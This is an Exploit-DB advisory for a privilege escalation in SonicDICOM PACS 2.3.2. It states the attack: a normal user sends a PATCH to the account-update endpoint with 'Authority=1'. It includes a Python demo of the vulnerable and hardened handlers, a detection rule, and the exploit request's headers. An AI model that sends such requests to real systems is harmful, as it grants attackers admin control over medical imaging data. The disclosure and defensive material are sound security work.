SonicDICOM PACS 2.3.2 - Privilege Escalation

ID EDB-ID:41311
Type exploitdb
Reporter Exploit-DB
Modified 2017-02-11T00:00:00


SonicDICOM PACS 2.3.2 - Privilege Escalation. Webapps exploit for Windows platform

SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit

Vendor: JIUN Corporation
Product web page:
Affected version: 2.3.2 and 2.3.1

Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.

Desc: The application suffers from a privilege escalation vulnerability.
A normal (non-admin) user can elevate his/her privileges by sending an HTTP
PATCH request to the account-update endpoint that sets the parameter
'Authority' to the integer value '1', gaining admin rights.
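The flaw described above is a classic mass-assignment bug: the account-update
handler binds every posted field, including the privilege field, to the
caller's own record. The following is an added illustration, not SonicDICOM
code, of that vulnerable pattern next to an allow-listed version and a simple
detection rule. Only the field name 'Authority' and the value 1 for admin come
from the advisory; the other field names (Id, Name, Password), the account
table and the request bodies are constructed assumptions for the example.

```python
from urllib.parse import parse_qs

ADMIN, USER = 1, 0  # 'Authority' values; 1 = admin per the advisory

# Assumed field names for the example (only 'Authority' is from the advisory).
SELF_SERVICE_FIELDS = {"Name", "Password"}
ADMIN_FIELDS = SELF_SERVICE_FIELDS | {"Authority"}


def fresh_accounts() -> dict:
    """Constructed sample account table, not real data."""
    return {
        "alice": {"Id": 2, "Name": "alice", "Password": "x", "Authority": USER},
        "root":  {"Id": 1, "Name": "root",  "Password": "y", "Authority": ADMIN},
    }


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body; last value wins."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}


def update_vulnerable(accounts: dict, caller: str, body: str) -> dict:
    """Vulnerable pattern: bind every posted field to the caller's record."""
    acct = accounts[caller]
    for k, v in parse_form(body).items():
        acct[k] = int(v) if k == "Authority" else v
    return acct


def update_hardened(accounts: dict, caller: str, body: str) -> dict:
    """Fixed pattern: per-role allow-list; only admins may touch 'Authority'."""
    acct = accounts[caller]
    allowed = ADMIN_FIELDS if acct["Authority"] == ADMIN else SELF_SERVICE_FIELDS
    fields = parse_form(body)
    forbidden = set(fields) - allowed
    if forbidden:
        raise PermissionError(f"{caller} may not set {sorted(forbidden)}")
    for k, v in fields.items():
        acct[k] = int(v) if k == "Authority" else v
    return acct


def handle_patch(accounts: dict, caller: str, body: str) -> tuple:
    """Simulated hardened PATCH handler: (HTTP status, caller's record)."""
    try:
        return 200, update_hardened(accounts, caller, body)
    except PermissionError:
        return 403, accounts[caller]


def escalation_attempt(accounts: dict, caller: str, body: str) -> bool:
    """Detection rule: a non-admin caller posting the privilege field."""
    return accounts[caller]["Authority"] != ADMIN and "Authority" in parse_form(body)


if __name__ == "__main__":
    body = "Name=alice&Authority=1"  # constructed request body
    print("vulnerable:", update_vulnerable(fresh_accounts(), "alice", body)["Authority"])
    print("hardened:", handle_patch(fresh_accounts(), "alice", body)[0])
    print("alert:", escalation_attempt(fresh_accounts(), "alice", body))
```

The hardened variant decides the allow-list from the caller's stored role, not
from anything in the request, and refuses the whole update rather than silently
dropping the forbidden field, so a blocked attempt is visible in the logs.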

Tested on: Microsoft-HTTPAPI/2.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2017-5396
Advisory URL:



PATCH /viewer/api/accounts/update HTTP/1.1
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Escalation Browser/1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close